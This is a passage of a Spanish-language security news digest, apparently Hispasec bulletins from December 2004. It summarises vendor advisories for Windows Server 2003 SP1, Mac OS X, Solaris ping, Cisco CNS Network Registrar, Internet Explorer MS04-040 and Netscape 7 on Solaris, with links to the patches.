las últimas actualizaciones necesarias y Security Configuration
Wizard (SCW) destinado a bloquear los puertos y servicios no
necesarios en función de los roles asignados al servidor.

También se han incluido mejoras en las funcionalidades originales
de Windows Server 2003, destinadas a aumentar la seguridad,
fiabilidad y la productividad.

La Release Candidate del SP1 para Windows Server 2003 se encuentra
disponible para descarga desde:
http://download.microsoft.com/download/5/2/e/52ee63dd-8a51-49ba-a494-856b3f63c848/srsp1.exe


Antonio Ropero
antonior@hispasec.com


Más información:

Windows Server 2003 Service Pack 1 Release Candidate
http://www.microsoft.com/windowsserver2003/downloads/servicepacks/sp1/default.mspx

domingo, 5 de diciembre de 2004

Actualización de seguridad para Mac OS X

Apple publica una nueva actualización de seguridad para su sistema
operativo MacOS X.

Mac OS X es el último sistema operativo nativo de la compañía Apple,
que proporciona un entorno moderno y de calidad para plataformas
PowerPC.

La actualización de seguridad publicada está destinada a solucionar
diversas vulnerabilidades en Apache y dos vulnerabilidades en Appkit,
incluido un desbordamiento de entero que puede llegar a permitir la
ejecución de código arbitrario en el sistema.

Otros problemas corregidos son:

* El uso de autenticación Kerberos con Cyrus IMAP puede permitir a un
usuario autenticado conseguir acceso a todos los buzones de correo del
sistema.

* Cierre no autorizado de aplicaciones en modo quiosco.

* Una vulnerabilidad de denegación de servicio cuando se usa autenticación
Kerberos.

* Postfix usando CRAM-MD5 puede permitir a usuarios remotos enviar
correo sin la adecuada autenticación.

* Un desbordamiento de búfer en la conversión PostScript a PDF puede
permitir la ejecución de código arbitrario.

* Denegación de servicio en QuickTime Streaming Server al recibir
peticiones maliciosamente construidas.

* Falsificación de la URL en barra de estado del navegador Safari
por HTML malicioso.

* Con diversas ventanas activas del navegador Safari pueden ser
engañados sobre que ventana ha activado un pop-up.

* Terminal puede indicar que 'Secure Keyboard Entry' está activo
falsamente.

La actualización disponible para Mac OS X 10.2.8 y 10.3.6 (en versiones
cliente y servidor) se encuentra disponible para descarga desde:
http://www.apple.com/support/downloads/


Antonio Ropero
antonior@hispasec.com


Más información:

Apple Security Updates
Security Update 2004-12-02
http://www.apple.com/support/security/security_updates.html

sábado, 4 de diciembre de 2004

Desbordamiento de búfer en ping de Solaris

Se ha descubierto una vulnerabilidad en el ping de Sun Solaris que
puede ser explotada por usuarios locales maliciosos para elevar sus
privilegios en el sistema.

La vulnerabilidad se debe a un error de tamaños de variables sin
especificar dentro de la utilidad ping, y que puede ser explotado
para provocar un desbordamiento de búfer. La explotación con éxito
de esta vulnerabilidad, que afecta a las versiones 7, 8 y 9 de
Solaris, puede permitir la ejecución de código arbitrario con
privilegios escalados.

Conviene señalar la importancia del problema debido al uso habitual
de este comando, que por su sencillez puede llegar a ser considerado
como inofensivo. Se recomienda actualizar los sistemas con los parches publicados por Sun, y disponibles en las siguientes direcciones (según
versión):

Para Solaris 7:
SPARC: http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-118313-01-1
x86: http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-118314-01-1

Para Solaris 8:
SPARC: http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-116986-02-1
x86: http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-116987-02-1

Para Solaris 9:
SPARC: http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-116774-03-1
x86: http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-116775-03-1


Antonio Ropero
antonior@hispasec.com


Más información:

Security Vulnerability in ping(1M)
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57675-1

viernes, 3 de diciembre de 2004

Denegaciones de servicio en Cisco CNS Network Registrar

Se han descubierto dos vulnerabilidades en Cisco CNS Network Registrar
(sobre plataformas Windowsw NT y 2000) que pueden ser explotadas por
usuarios maliciosos para provocar denegaciones de servicio.

El primero de los problemas anunciados se debe a un error sin
especificar en el CCM (Central Configurarion Management) de dicho
producto, que puede ser explotado para provocar un gran consumo de
recursos de CPU cerrando una conexión una vez se ha enviado una
secuencia de paquetes especialmente creada a tal efecto. Esta
vulnerabilidad afecta a las versiones de la 6.0 a la 6.1.1.3.

Otro error sin especificar en el control de bloqueos de CNS Network
Registrar puede ser explotado para tirar la aplicación junto con el
servidor CCM enviando una secuencia de paquetes especialmente
construida a tal efecto. Esta vulnerabilidad afecta a la versión
6.1.1.3 y anteriores.

Se recomienda actualizar con el parche 6.1.1.4, disponible en la
siguiente dirección:
http://www.cisco.com/pcgi-bin/Software/Tablebuild/tablebuild.pl/nr-eval


Julio Canto
jcanto@hispasec.com


Más información:

Cisco Security Advisory: Cisco CNS Network Registrar Denial of Service
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20041202-cnr.shtml

jueves, 2 de diciembre de 2004

Actualización crítica de Internet Explorer para vulnerabilidad en IFRAME

Microsoft rompe su habitual práctica de publicar boletines y
actualizaciones de seguridad los segundos martes de mes, para
publicar el día uno de diciembre una actualización crítica para
Internet Explorer 6.

La actualización publicada por Microsoft tiene como objeto cubrir una
reciente vulnerabilidad descubierta en su navegador y que permitía
la ejecución de código remota en los sistemas afectados.

La vulnerabilidad está provocada por un error de límites en el
tratamiento los atributos SRC y NAME de las etiquetas IFRAME, lo
que provoca un desbordamiento de búfer al presentar un documento
html maliciosamente preparado a tal efecto. Hay que señalar que ya
existen exploits publicados que aprovechan la vulnerabilidad.

La actualización publicada por Microsoft es acumulativa, lo que quiere
decir que incluye todas las actualizaciones publicadas para Internet
Explorer hasta la fecha.

Microsoft publica las siguientes actualizaciones:

Para Internet Explorer 6 SP 1 sobre Windows 2000 SP4 o Windows XP SP 1:
http://www.microsoft.com/downloads/details.aspx?FamilyId=3A9DBD51-4348-4EE6-9BC1-D9A1E12963EC

Para Internet Explorer 6 SP 1 sobre Windows NT Server 4.0 SP 6a, o Windows NT Server 4.0 Terminal Service Edition SP 6, o Windows 98, o Windows Me:
http://www.microsoft.com/downloads/details.aspx?FamilyId=96DE6C13-4F67-4581-8F51-2C8A90E11C57

Para Internet Explorer 6 para Windows XP SP 1 (64-Bit Edition):
http://www.microsoft.com/downloads/details.aspx?FamilyId=1e9105cf-eb5b-4af5-b73d-03e8969e0b5c

Los sistemas Windows XP con Service Pack 2 instalado no se ven afectados.


Antonio Ropero
antonior@hispasec.com


Más información:

Microsoft Security Bulletin MS04-040
Cumulative Security Update for Internet Explorer (889293)
http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx

(Exploit Code Has Been Released) Microsoft Internet Explorer
Buffer Overflow in IFRAME/EMBED Tag Processing Lets Remote Users
Execute Arbitrary Code
http://securitytracker.com/alerts/2004/Nov/1012049.html

miércoles, 1 de diciembre de 2004

Vulnerabilidades en navegador Netscape 7 para Sun Solaris 7, 8 y 9

Netscape 7 para Sun Solaris 7, 8 y 9 se ve afectado por varios
problemas de seguridad que explotados por un atacante podrían
causar una denegación de servicio e incluso la ejecución de
código en el sistema afectado.

Sun ha reconocido algunas vulnerabilidades en el navegador Netscape 7
para Solaris que pueden ser explotadas por usuarios maliciosos para
provocar denegaciones de servicio o incluso comprometer un sistema
afectado.

Normalmente este navegador no forma parte del sistema, pero
ha sido distribuido en la versión 9 Update 3 y posteriores, además
de estar disponible para las versiones 7, 8 y 9 como parte del
paquete SUNWnsb.

Uno de los problemas está relacionado con una librería libpng(3), que
es la encargada del tratamiento de los archivos de imágenes (PNG)
Portable Network Graphics. Si un atacante introdujera un una imagen PNG
especialmente malformada en un sitio web o en un mensaje de corre
electrónico, podría causar la ejecución de código con los privilegios
del usuario local.

A la espera de un parche que corrija dichas vulnerabilidades, se
recomienda utilizar otro producto para navegar.


Antonio Román
roman@hispasec.com


Más información:

Security Vulnerability in Netscape 7 With PNG Files
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1